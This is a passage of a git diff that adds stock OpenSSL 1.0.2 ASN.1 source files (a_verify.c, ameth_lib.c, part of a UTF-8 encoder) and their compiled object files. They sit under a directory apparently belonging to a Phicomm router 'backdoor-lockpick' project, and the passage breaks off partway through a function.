+        len = 6;                /* Maximum we will need */
+    else if (len <= 0)
+        return -1;
+    if (value < 0x80) {
+        if (str)
+            *str = (unsigned char)value;
+        return 1;
+    }
+    if (value < 0x800) {
+        if (len < 2)
+            return -1;
+        if (str) {
+            *str++ = (unsigned char)(((value >> 6) & 0x1f) | 0xc0);
+            *str = (unsigned char)((value & 0x3f) | 0x80);
+        }
+        return 2;
+    }
+    if (value < 0x10000) {
+        if (len < 3)
+            return -1;
+        if (str) {
+            *str++ = (unsigned char)(((value >> 12) & 0xf) | 0xe0);
+            *str++ = (unsigned char)(((value >> 6) & 0x3f) | 0x80);
+            *str = (unsigned char)((value & 0x3f) | 0x80);
+        }
+        return 3;
+    }
+    if (value < 0x200000) {
+        if (len < 4)
+            return -1;
+        if (str) {
+            *str++ = (unsigned char)(((value >> 18) & 0x7) | 0xf0);
+            *str++ = (unsigned char)(((value >> 12) & 0x3f) | 0x80);
+            *str++ = (unsigned char)(((value >> 6) & 0x3f) | 0x80);
+            *str = (unsigned char)((value & 0x3f) | 0x80);
+        }
+        return 4;
+    }
+    if (value < 0x4000000) {
+        if (len < 5)
+            return -1;
+        if (str) {
+            *str++ = (unsigned char)(((value >> 24) & 0x3) | 0xf8);
+            *str++ = (unsigned char)(((value >> 18) & 0x3f) | 0x80);
+            *str++ = (unsigned char)(((value >> 12) & 0x3f) | 0x80);
+            *str++ = (unsigned char)(((value >> 6) & 0x3f) | 0x80);
+            *str = (unsigned char)((value & 0x3f) | 0x80);
+        }
+        return 5;
+    }
+    if (len < 6)
+        return -1;
+    if (str) {
+        *str++ = (unsigned char)(((value >> 30) & 0x1) | 0xfc);
+        *str++ = (unsigned char)(((value >> 24) & 0x3f) | 0x80);
+        *str++ = (unsigned char)(((value >> 18) & 0x3f) | 0x80);
+        *str++ = (unsigned char)(((value >> 12) & 0x3f) | 0x80);
+        *str++ = (unsigned char)(((value >> 6) & 0x3f) | 0x80);
+        *str = (unsigned char)((value & 0x3f) | 0x80);
+    }
+    return 6;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_utf8.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_utf8.o
new file mode 100644
index 0000000000000000000000000000000000000000..ef2f55584ae2b470e01530e4874ae24affc9142e
GIT binary patch
literal 2776
zcmbtV-D@LN6u-%&AJM{ei?D%RYJI4y=nk!}Y?W#<Y`dL8Yf&r}K}%Y*Ex7%#O>9?W
zlX{zOCa}R5eeuCJ!GEAe1W5=ksSoQaA{AefeQ52AqzX%0YR2EWGdG>4WncEfWX}Da
zuirWM+)2ED=&IM_VRCucYwTzzQN}i#j^vOKL#%~8&i+-~5Bj@v$p>ntTVbp(t@f{O
zEUUV@p4YP!Xy+`!<_00WTuSWcV#7KwTGm~4)$%fy9`Wee|18Tg@A9o&C{azQ$!*~I
zQX?-1_3R;3ojGJT{6&NB#nrV9X!R_9*v|L(MQmQKB=$?O4=FCMdezL=z}5978F`nN
zbBTQf&Hzu3c+H>rHd0wYJ^_+1wdA)N?NlpUITgO&=KK|7vSOG;UJ4qJU$sC%T^okE
zo<&7$CkU~R^n1M(HTeY~JH4W2E<oi<U*V-(FLJdC80q0801FKYrQ?dZ=Ky~L7&424
z=6-&w#U^CrOKmzj(aG3(Hsmkr=B~a{W)+1E`txQHZR#Y((14>w9KS&jJ?kTmUqTcd
z4}162<aafWJ~hKd?pli^$Lr*g9`p8@_Z&{|08!URlp5<n;TiYUSoZ(`>l)txxH4tX
z%o`>;SfvX178P(PX!<Kd=I;gyT-l;B4F8>@GVE4cPoj+b#5UVNW&DO8l%Z#<7zSRd
z_8zLq0;$D$H>jC)Y(nW1#e7A6>2VaZ=@fHYAY+OwFBV5>KBu(U0uH0WDJvF1NnjZm
zHviz;K@`yrzKjJ2^W`>YEGa7;1_~qM{ym(+u=xutS{`ynmhzEb&o;u@FhMO>pgUwF
zt!OjKNj`|5DTs?>@PoK|>sOc+NL*@8ofUY&SUI3!TzcBMML(kb29E1KNdDExe@gIT
zE;Z&!HHkYS%rO^Bm*wU7+_r~t3on*ZO~-vp!PJ<S7Za%gkC=1Y9|v;lQ&15xFyU|1
zVzlvMMZ^&CN<rK8WK2aUykag3f|*l?y5>VLk&6&9!v7$Zu>3)^iC`LuKWzrW%u<#n
zcol<uhiqv~&_Z=JOM-b1WCFanCyBM;7T1WmiF!{G^$9~oge>rC!_8^?tZ+c@*^%3M
z$-|3>GI*dacr6(PcPCR$CTkGMd?G`kzy_{dd8Ol-(TUh>G}iI5_M+BxvHNmNY`bs1
z(4}=<de(*+UGG*rRQSN_qYR&x9AWfnqV<IRVxEuRWS-?#&$*VS=FiY)@;UG5`W$1z
zx*W`pKo468f!w<|rISlJ^`C<{ogP%Fu{|D35mg<>Xs0lmhLcNSu0JQ2S`l4x0T3U<
z)8^tSdqDjnT<&Xq2#?32*Lt)`Hu~1pp7E(j)RE?6kQnR0LyIbOS9wXGN4Sj3w8a}U
z(eMP`(FOZGEv0B=Im)#6!_hF)CKeZ&HaRyl6PX1zI~R>;IOdCs(eUI4&VFh(rp+(R
z%|{lZH<-2%xgORc)8p3`!ZQ&k`6Il}!I#duzT+V$<}eMOYmu#cJ%tTnavr7bcAcNZ
z>-{f4(fkPh&%>8u%DILpmdyX01e~|bFW)Z#m$KVbd=}h5oxfD|L!ha2&jjhDe+O+`
zi)wYRcd?=T_5Pbq|3YqK$o2kj1EcRj2#<S(oU0=H;)jwT=^t>6Ps>fJfHM%yPIKr!
lQH*+j!s^c+5bJRAx6{V8>U(_#y3_pU9senpFNyX3{{u<~nz#S}

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_verify.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_verify.c
new file mode 100644
index 0000000..3ffd934
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_verify.c
@@ -0,0 +1,231 @@
+/* crypto/asn1/a_verify.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <time.h>
+
+#include "cryptlib.h"
+#include "asn1_locl.h"
+
+#ifndef NO_SYS_TYPES_H
+# include <sys/types.h>
+#endif
+
+#include <openssl/bn.h>
+#include <openssl/x509.h>
+#include <openssl/objects.h>
+#include <openssl/buffer.h>
+#include <openssl/evp.h>
+
+#ifndef NO_ASN1_OLD
+
+int ASN1_verify(i2d_of_void *i2d, X509_ALGOR *a, ASN1_BIT_STRING *signature,
+                char *data, EVP_PKEY *pkey)
+{
+    EVP_MD_CTX ctx;
+    const EVP_MD *type;
+    unsigned char *p, *buf_in = NULL;
+    int ret = -1, i, inl;
+
+    EVP_MD_CTX_init(&ctx);
+    i = OBJ_obj2nid(a->algorithm);
+    type = EVP_get_digestbyname(OBJ_nid2sn(i));
+    if (type == NULL) {
+        ASN1err(ASN1_F_ASN1_VERIFY, ASN1_R_UNKNOWN_MESSAGE_DIGEST_ALGORITHM);
+        goto err;
+    }
+
+    if (signature->type == V_ASN1_BIT_STRING && signature->flags & 0x7) {
+        ASN1err(ASN1_F_ASN1_VERIFY, ASN1_R_INVALID_BIT_STRING_BITS_LEFT);
+        goto err;
+    }
+
+    inl = i2d(data, NULL);
+    buf_in = OPENSSL_malloc((unsigned int)inl);
+    if (buf_in == NULL) {
+        ASN1err(ASN1_F_ASN1_VERIFY, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    p = buf_in;
+
+    i2d(data, &p);
+    if (!EVP_VerifyInit_ex(&ctx, type, NULL)
+        || !EVP_VerifyUpdate(&ctx, (unsigned char *)buf_in, inl)) {
+        ASN1err(ASN1_F_ASN1_VERIFY, ERR_R_EVP_LIB);
+        ret = 0;
+        goto err;
+    }
+
+    OPENSSL_cleanse(buf_in, (unsigned int)inl);
+    OPENSSL_free(buf_in);
+
+    if (EVP_VerifyFinal(&ctx, (unsigned char *)signature->data,
+                        (unsigned int)signature->length, pkey) <= 0) {
+        ASN1err(ASN1_F_ASN1_VERIFY, ERR_R_EVP_LIB);
+        ret = 0;
+        goto err;
+    }
+    /*
+     * we don't need to zero the 'ctx' because we just checked public
+     * information
+     */
+    /* memset(&ctx,0,sizeof(ctx)); */
+    ret = 1;
+ err:
+    EVP_MD_CTX_cleanup(&ctx);
+    return (ret);
+}
+
+#endif
+
+int ASN1_item_verify(const ASN1_ITEM *it, X509_ALGOR *a,
+                     ASN1_BIT_STRING *signature, void *asn, EVP_PKEY *pkey)
+{
+    EVP_MD_CTX ctx;
+    unsigned char *buf_in = NULL;
+    int ret = -1, inl;
+
+    int mdnid, pknid;
+
+    if (!pkey) {
+        ASN1err(ASN1_F_ASN1_ITEM_VERIFY, ERR_R_PASSED_NULL_PARAMETER);
+        return -1;
+    }
+
+    if (signature->type == V_ASN1_BIT_STRING && signature->flags & 0x7) {
+        ASN1err(ASN1_F_ASN1_ITEM_VERIFY, ASN1_R_INVALID_BIT_STRING_BITS_LEFT);
+        return -1;
+    }
+
+    EVP_MD_CTX_init(&ctx);
+
+    /* Convert signature OID into digest and public key OIDs */
+    if (!OBJ_find_sigid_algs(OBJ_obj2nid(a->algorithm), &mdnid, &pknid)) {
+        ASN1err(ASN1_F_ASN1_ITEM_VERIFY, ASN1_R_UNKNOWN_SIGNATURE_ALGORITHM);
+        goto err;
+    }
+    if (mdnid == NID_undef) {
+        if (!pkey->ameth || !pkey->ameth->item_verify) {
+            ASN1err(ASN1_F_ASN1_ITEM_VERIFY,
+                    ASN1_R_UNKNOWN_SIGNATURE_ALGORITHM);
+            goto err;
+        }
+        ret = pkey->ameth->item_verify(&ctx, it, asn, a, signature, pkey);
+        /*
+         * Return value of 2 means carry on, anything else means we exit
+         * straight away: either a fatal error of the underlying verification
+         * routine handles all verification.
+         */
+        if (ret != 2)
+            goto err;
+        ret = -1;
+    } else {
+        const EVP_MD *type;
+        type = EVP_get_digestbynid(mdnid);
+        if (type == NULL) {
+            ASN1err(ASN1_F_ASN1_ITEM_VERIFY,
+                    ASN1_R_UNKNOWN_MESSAGE_DIGEST_ALGORITHM);
+            goto err;
+        }
+
+        /* Check public key OID matches public key type */
+        if (EVP_PKEY_type(pknid) != pkey->ameth->pkey_id) {
+            ASN1err(ASN1_F_ASN1_ITEM_VERIFY, ASN1_R_WRONG_PUBLIC_KEY_TYPE);
+            goto err;
+        }
+
+        if (!EVP_DigestVerifyInit(&ctx, NULL, type, NULL, pkey)) {
+            ASN1err(ASN1_F_ASN1_ITEM_VERIFY, ERR_R_EVP_LIB);
+            ret = 0;
+            goto err;
+        }
+
+    }
+
+    inl = ASN1_item_i2d(asn, &buf_in, it);
+
+    if (buf_in == NULL) {
+        ASN1err(ASN1_F_ASN1_ITEM_VERIFY, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    if (!EVP_DigestVerifyUpdate(&ctx, buf_in, inl)) {
+        ASN1err(ASN1_F_ASN1_ITEM_VERIFY, ERR_R_EVP_LIB);
+        ret = 0;
+        goto err;
+    }
+
+    OPENSSL_cleanse(buf_in, (unsigned int)inl);
+    OPENSSL_free(buf_in);
+
+    if (EVP_DigestVerifyFinal(&ctx, signature->data,
+                              (size_t)signature->length) <= 0) {
+        ASN1err(ASN1_F_ASN1_ITEM_VERIFY, ERR_R_EVP_LIB);
+        ret = 0;
+        goto err;
+    }
+    /*
+     * we don't need to zero the 'ctx' because we just checked public
+     * information
+     */
+    /* memset(&ctx,0,sizeof(ctx)); */
+    ret = 1;
+ err:
+    EVP_MD_CTX_cleanup(&ctx);
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_verify.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_verify.o
new file mode 100644
index 0000000000000000000000000000000000000000..9daac47bc27e85a5b045f21c34a4788c59464230
GIT binary patch
literal 4224
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
JbVj7y{vT^zM5+J)

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/ameth_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/ameth_lib.c
new file mode 100644
index 0000000..02300df
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/ameth_lib.c
@@ -0,0 +1,466 @@
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2006.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/x509.h>
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+#include "asn1_locl.h"
+
+extern const EVP_PKEY_ASN1_METHOD rsa_asn1_meths[];
+extern const EVP_PKEY_ASN1_METHOD dsa_asn1_meths[];
+extern const EVP_PKEY_ASN1_METHOD dh_asn1_meth;
+extern const EVP_PKEY_ASN1_METHOD dhx_asn1_meth;
+extern const EVP_PKEY_ASN1_METHOD eckey_asn1_meth;
+extern const EVP_PKEY_ASN1_METHOD hmac_asn1_meth;
+extern const EVP_PKEY_ASN1_METHOD cmac_asn1_meth;
+
+/* Keep this sorted in type order !! */
+static const EVP_PKEY_ASN1_METHOD *standard_methods[] = {
+#ifndef OPENSSL_NO_RSA
+    &rsa_asn1_meths[0],
+    &rsa_asn1_meths[1],
+#endif
+#ifndef OPENSSL_NO_DH
+    &dh_asn1_meth,
+#endif
+#ifndef OPENSSL_NO_DSA
+    &dsa_asn1_meths[0],
+    &dsa_asn1_meths[1],
+    &dsa_asn1_meths[2],
+    &dsa_asn1_meths[3],
+    &dsa_asn1_meths[4],
+#endif
+#ifndef OPENSSL_NO_EC
+    &eckey_asn1_meth,
+#endif
+    &hmac_asn1_meth,
+    &cmac_asn1_meth,
+#ifndef OPENSSL_NO_DH
+    &dhx_asn1_meth
+#endif
+};
+
+typedef int sk_cmp_fn_type(const char *const *a, const char *const *b);
+DECLARE_STACK_OF(EVP_PKEY_ASN1_METHOD)
+static STACK_OF(EVP_PKEY_ASN1_METHOD) *app_methods = NULL;
+
+#ifdef TEST
+void main()
+{
+    int i;
+    for (i = 0;
+         i < sizeof(standard_methods) / sizeof(EVP_PKEY_ASN1_METHOD *); i++)
+        fprintf(stderr, "Number %d id=%d (%s)\n", i,
+                standard_methods[i]->pkey_id,
+                OBJ_nid2sn(standard_methods[i]->pkey_id));
+}
+#endif
+
+DECLARE_OBJ_BSEARCH_CMP_FN(const EVP_PKEY_ASN1_METHOD *,
+                           const EVP_PKEY_ASN1_METHOD *, ameth);
+
+static int ameth_cmp(const EVP_PKEY_ASN1_METHOD *const *a,
+                     const EVP_PKEY_ASN1_METHOD *const *b)
+{
+    return ((*a)->pkey_id - (*b)->pkey_id);
+}
+
+IMPLEMENT_OBJ_BSEARCH_CMP_FN(const EVP_PKEY_ASN1_METHOD *,
+                             const EVP_PKEY_ASN1_METHOD *, ameth);
+
+int EVP_PKEY_asn1_get_count(void)
+{
+    int num = sizeof(standard_methods) / sizeof(EVP_PKEY_ASN1_METHOD *);
+    if (app_methods)
+        num += sk_EVP_PKEY_ASN1_METHOD_num(app_methods);
+    return num;
+}
+
+const EVP_PKEY_ASN1_METHOD *EVP_PKEY_asn1_get0(int idx)
+{
+    int num = sizeof(standard_methods) / sizeof(EVP_PKEY_ASN1_METHOD *);
+    if (idx < 0)
+        return NULL;
+    if (idx < num)
+        return standard_methods[idx];
+    idx -= num;
+    return sk_EVP_PKEY_ASN1_METHOD_value(app_methods, idx);
+}
+
+static const EVP_PKEY_ASN1_METHOD *pkey_asn1_find(int type)
+{
+    EVP_PKEY_ASN1_METHOD tmp;
+    const EVP_PKEY_ASN1_METHOD *t = &tmp, **ret;
+    tmp.pkey_id = type;
+    if (app_methods) {
+        int idx;
+        idx = sk_EVP_PKEY_ASN1_METHOD_find(app_methods, &tmp);
+        if (idx >= 0)
+            return sk_EVP_PKEY_ASN1_METHOD_value(app_methods, idx);
+    }
+    ret = OBJ_bsearch_ameth(&t, standard_methods, sizeof(standard_methods)
+                            / sizeof(EVP_PKEY_ASN1_METHOD *));
+    if (!ret || !*ret)
+        return NULL;
+    return *ret;
+}
+
+/*
+ * Find an implementation of an ASN1 algorithm. If 'pe' is not NULL also
+ * search through engines and set *pe to a functional reference to the engine
+ * implementing 'type' or NULL if no engine implements it.
+ */
+
+const EVP_PKEY_ASN1_METHOD *EVP_PKEY_asn1_find(ENGINE **pe, int type)
+{
+    const EVP_PKEY_ASN1_METHOD *t;
+
+    for (;;) {
+        t = pkey_asn1_find(type);
+        if (!t || !(t->pkey_flags & ASN1_PKEY_ALIAS))
+            break;
+        type = t->pkey_base_id;
+    }
+    if (pe) {
+#ifndef OPENSSL_NO_ENGINE
+        ENGINE *e;
+        /* type will contain the final unaliased type */
+        e = ENGINE_get_pkey_asn1_meth_engine(type);
+        if (e) {
+            *pe = e;
+            return ENGINE_get_pkey_asn1_meth(e, type);
+        }
+#endif
+        *pe = NULL;
+    }
+    return t;
+}
+
+const EVP_PKEY_ASN1_METHOD *EVP_PKEY_asn1_find_str(ENGINE **pe,
+                                                   const char *str, int len)
+{
+    int i;
+    const EVP_PKEY_ASN1_METHOD *ameth;
+    if (len == -1)
+        len = strlen(str);
+    if (pe) {
+#ifndef OPENSSL_NO_ENGINE
+        ENGINE *e;
+        ameth = ENGINE_pkey_asn1_find_str(&e, str, len);
+        if (ameth) {
+            /*
+             * Convert structural into functional reference
+             */
+            if (!ENGINE_init(e))
+                ameth = NULL;
+            ENGINE_free(e);
+            *pe = e;
+            return ameth;
+        }
+#endif
+        *pe = NULL;
+    }
+    for (i = 0; i < EVP_PKEY_asn1_get_count(); i++) {
+        ameth = EVP_PKEY_asn1_get0(i);
+        if (ameth->pkey_flags & ASN1_PKEY_ALIAS)
+            continue;
+        if (((int)strlen(ameth->pem_str) == len) &&
+            !strncasecmp(ameth->pem_str, str, len))
+            return ameth;
+    }
+    return NULL;
+}
+
+int EVP_PKEY_asn1_add0(const EVP_PKEY_ASN1_METHOD *ameth)
+{
+    if (app_methods == NULL) {
+        app_methods = sk_EVP_PKEY_ASN1_METHOD_new(ameth_cmp);
+        if (!app_methods)
+            return 0;
+    }
+    if (!sk_EVP_PKEY_ASN1_METHOD_push(app_methods, ameth))
+        return 0;
+    sk_EVP_PKEY_ASN1_METHOD_sort(app_methods);
+    return 1;
+}
+
+int EVP_PKEY_asn1_add_alias(int to, int from)
+{
+    EVP_PKEY_ASN1_METHOD *ameth;
+    ameth = EVP_PKEY_asn1_new(from, ASN1_PKEY_ALIAS, NULL, NULL);
+    if (!ameth)
+        return 0;
+    ameth->pkey_base_id = to;
+    if (!EVP_PKEY_asn1_add0(ameth)) {
+        EVP_PKEY_asn1_free(ameth);
+        return 0;
+    }
+    return 1;
+}
+
+int EVP_PKEY_asn1_get0_info(int *ppkey_id, int *ppkey_base_id,
+                            int *ppkey_flags, const char **pinfo,
+                            const char **ppem_str,
+                            const EVP_PKEY_ASN1_METHOD *ameth)
+{
+    if (!ameth)
+        return 0;
+    if (ppkey_id)
+        *ppkey_id = ameth->pkey_id;
+    if (ppkey_base_id)
+        *ppkey_base_id = ameth->pkey_base_id;
+    if (ppkey_flags)
+        *ppkey_flags = ameth->pkey_flags;
+    if (pinfo)
+        *pinfo = ameth->info;
+    if (ppem_str)
+        *ppem_str = ameth->pem_str;
+    return 1;
+}
+
+const EVP_PKEY_ASN1_METHOD *EVP_PKEY_get0_asn1(EVP_PKEY *pkey)
+{
+    return pkey->ameth;
+}
+
+EVP_PKEY_ASN1_METHOD *EVP_PKEY_asn1_new(int id, int flags,
+                                        const char *pem_str, const char *info)
+{
+    EVP_PKEY_ASN1_METHOD *ameth;
+    ameth = OPENSSL_malloc(sizeof(EVP_PKEY_ASN1_METHOD));
+    if (!ameth)
+        return NULL;
+
+    memset(ameth, 0, sizeof(EVP_PKEY_ASN1_METHOD));
+
+    ameth->pkey_id = id;
+    ameth->pkey_base_id = id;
+    ameth->pkey_flags = flags | ASN1_PKEY_DYNAMIC;
+
